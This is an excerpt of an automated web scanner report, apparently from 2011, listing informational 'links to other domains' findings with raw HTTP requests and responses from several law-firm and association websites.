<!doctype html> <head> <title>Pillsbury Winthrop Shaw Pittman - Google Search</title> <script>window.google={kEI:"1wXMTf-QA8nB0QGlyoHnBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Pillsbury+Winthrop+Shaw+Pittman&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nKA2-ruJEfgJ:www.pillsburylaw.com/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCcQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=13" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoADAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=3" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=80" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoAjAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=11" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoAzAA')">Services</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=25" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBDAA')">Publications &amp; Presentations</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageID=53" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBTAA')">What Sets Us Apart</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=17" onmousedown="return clk(this.href,'','','','1','','0CC8QqwMoBjAA')">News</a></div><div class=sld><a class=sla href="http://www.pillsburylaw.com/index.cfm?pageid=5" onmousedown="return clk(this.href,'','','','1','','0CDAQqwMoBzAA')">Clients</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=13" class=l onmousedown="return clk(this.href,'','','','2','','0CDMQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:xgmnj32n288J:www.pillsburylaw.com/index.cfm%3FpageID%3D13+Pillsbury+Winthrop+Shaw+Pittman&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CDgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pillsburylaw.com/index.cfm?pageID=3" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:VpEHI2MEjbYJ:www.pillsburylaw.com/index.cfm%3FpageID%3D3+Pillsbury+Winthrop+Shaw+Pittman&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CEAQIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CEMQoAIwAw')" title="Pillsbury Winthrop Shaw Llp: Plotz Thomas J"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background:url('/images/red_icons_bg_A_J.png') no-repeat;background-position:0 -76px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.pillsburylaw.com/" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQoAIwBQ')" title="Pillsbury Winthrop Shaw Pittman"><em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman" class=l onmousedown="return clk(this.href,'','','','7','','0CFsQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:vvtaQHosgIwJ:en.wikipedia.org/wiki/Pillsbury_Winthrop_Shaw_Pittman+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CGAQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/pillsbury-winthrop-shaw-pittman" class=l onmousedown="return clk(this.href,'','','','8','','0CGIQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AorIwNzxdOIJ:www.linkedin.com/company/pillsbury-winthrop-shaw-pittman+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGcQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/snapshot/snapshot.asp?capId=1680186" class=l onmousedown="return clk(this.href,'','','','9','','0CGgQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Zb0r0IZPdCAJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D1680186+Pillsbury+Winthrop+Shaw+Pittman&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CG0QIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nndb.com/company/229/000124854/" class=l onmousedown="return clk(this.href,'','','','10','','0CG4QFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jshOjtS_4LoJ:www.nndb.com/company/229/000124854/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHMQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://pmstax.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LV9AgS4CwKMJ:pmstax.com/+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=11&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHkQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1" class=l onmousedown="return clk(this.href,'','','','12','','0CHsQFjAL')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NWDLC2TmklcJ:www.workingmother.com/best-companies/pillsbury-winthrop-shaw-pittman-1+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=12&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CIABECAwCw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP" class=l onmousedown="return clk(this.href,'','','','13','','0CIEBEBYwDA')">Venue: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:i7OHqk31etIJ:upcoming.yahoo.com/venue/11204/CA/Palo-Alto/Pillsbury-Winthrop-Shaw-Pittman-LLP+Pillsbury+Winthrop+Shaw+Pittman&amp;cd=13&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;client=firefox-a&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','13','','0CIYBECAwDA')">Cached</a>
...[SNIP]...
<div><a href="http://www.mofo.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CIgBEKIIMA0')">Morrison & Foerster</a>
...[SNIP]...
<div><a href="http://www.proskauer.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CIoBEKIIMA4')">Proskauer</a>
...[SNIP]...
<div><a href="http://www.morganlewis.com/" class=l onmousedown="return clk(this.href,'','','','16','','0CIwBEKIIMA8')">Morgan, Lewis & Bockius</a>
...[SNIP]...
<div><a href="http://www.cooley.com/" class=l onmousedown="return clk(this.href,'','','','17','','0CI4BEKIIMBA')">Cooley LLP</a>
...[SNIP]...
24.33. http://www.ngelaw.com/news/event_detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/event_detail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /news/event_detail.aspx?ID=688 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/events.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:24 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9625


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Tax Planning for Domestic & Foreign Partnerships, LLCs, Joint Ventures & Other Strategic Alliances 2011</title>
       <meta name="description" c
...[SNIP]...
<p>For more information,..<a target="_blank" href="http://www.pli.edu/Content.aspx?dsNav=Rpp:100,Arpp:100,Ns:sort_date|101|1|,N:4294962017-164&ID=97954">click here</a>
...[SNIP]...
24.34. http://www.orangecountyala.org/clubportal/memlogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/memlogin.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clubportal/memlogin.cfm?clubID=809 HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A06%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D3%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23;expires=Sat, 04-May-2041 18:12:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<br>


If you are not an existing member, please <a href="https://www.memberize.net/clubportal/MemberJoin.cfm?clubID=809">click here</a>
...[SNIP]...
</a> | <a href="http://www.alanet.org" style="color:FFFFFF; font-weight:bold; text-decoration:none;">ALA Headquarters</a>
...[SNIP]...
<td align="right"><a href="http://www.elawmarketing.com/" target="_blank" style="color:FFFFFF;;">Site by eLaw Marketing</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="http://www.orangecountyala.org/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
24.35. http://www.perkinscoie.com/events/eventslist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /events/eventslist.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /events/eventslist.aspx?Upcoming=true HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/mquehrn/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:56 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1173; path=/
Set-Cookie: PortletId=1873101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 69542
Content-Length: 69542


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Co
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
<div class="location"><a href="http://www.itechlaw.org/sanfrancisco2011/index.shtml" class="OrangeGoToLink" target="_blank">ITech World Technology Law Conference</a>
...[SNIP]...
<p>Pamela Anderson will be Program Co-Chair at this <a href="http://www.lawseminars.com/detail.php?SeminarCode=11ENVENWA" class="OrangeGoToLink" target="_blank">conference</a>
...[SNIP]...
<div class="location"><a href="http://www.fundingpost.com/breakfast/reg1.asp?event=187" target="_blank">Madison VC and Angel Event<br />
...[SNIP]...
<div class="location"><a href="http://shrmalaska.shrm.org" target="_blank">Anchorage Society for Human Resource Management</a>
...[SNIP]...
<p>Perkins Coie Partners Stewart M. Landefeld and Andrew Moore are Co-Chairs for this <a href="http://www.rrdonnelley.com/financial/Resources/Events/ArchivedEventsTranscripts/2011/CM_SECHotTopicsInstitute_SeattleWashington_May26_2011.asp" class="OrangeGoToLink" target="_blank">conference</a>
...[SNIP]...
<br /><a href="http://www.acc.com/education/am11/">Association of Corporate Council 2011 Annual Meeting</a>
...[SNIP]...
24.36. http://www.perkinscoie.com/professionals/professionals_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals_results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /professionals/professionals_results.aspx?LastName=Q HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals.aspx
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:13 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 38843
Content-Length: 38843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Perkins
...[SNIP]...
<!-- Google Analytics Start -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
24.37. http://www.pomerantzlaw.com/cases.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cases.html?action=caseDetail&CaseID=102 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102', 'CKx')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
24.38. http://www.pomerantzlaw.com/practice-areas.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /practice-areas.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3 HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305219554.2; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=182215078.3.10.1305219554; __utmc=182215078

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:59:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 11119


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</script><a href="http://www.addthis.com/bookmark.php" onmouseOver="return addthis_open(this, '', 'http://www.pomerantzlaw.com/practice-areas.html?action=practiceAreaDetail&PracticeAreaID=3', 'Class action securities litigation')" onmouseOut="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/button1-share.gif" width="125" height="16" border="0" alt="Bookmark" /></a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
24.39. http://www.stumbleupon.com/badge/embed/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /badge/embed/1/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /badge/embed/1/?url=http%3A%2F%2Fwww.gartner.com%2Ftechnology%2Fcio-priorities%2Fipad-business.jsp%3Fprm%3DTW_CHCIOP HTTP/1.1
Host: www.stumbleupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/cio-priorities/ipad-business.jsp?prm=TW_CHCIOP

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 20:19:36 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
       
   
           <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />
       
                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...
24.40. http://www.tydingslaw.com/Content.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tydingslaw.com
Path:   /Content.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Content.aspx?topic=Another_Thorn_in_Creditors_Sides_New_Case_Makes_Preference_Payments_Easier_to_Claw_Back HTTP/1.1
Host: www.tydingslaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx
Cookie: .ASPXANONYMOUS=SiwLHlBHzAEkAAAAZWI4NjFjNWItZDEwYS00ZTRjLWE1YzUtYzk2YWY4ZWNiNWIz0; ASP.NET_SessionId=oqvboc45xf0ikdjwyxeacaue; language=en-US; __utma=39294886.1731180425.1305216163.1305216163.1305216163.1; __utmb=39294886.3.10.1305216163; __utmc=39294886; __utmz=39294886.1305216163.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tydings%20%26%20Rosenberg

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:13:56 GMT
Content-Length: 23263

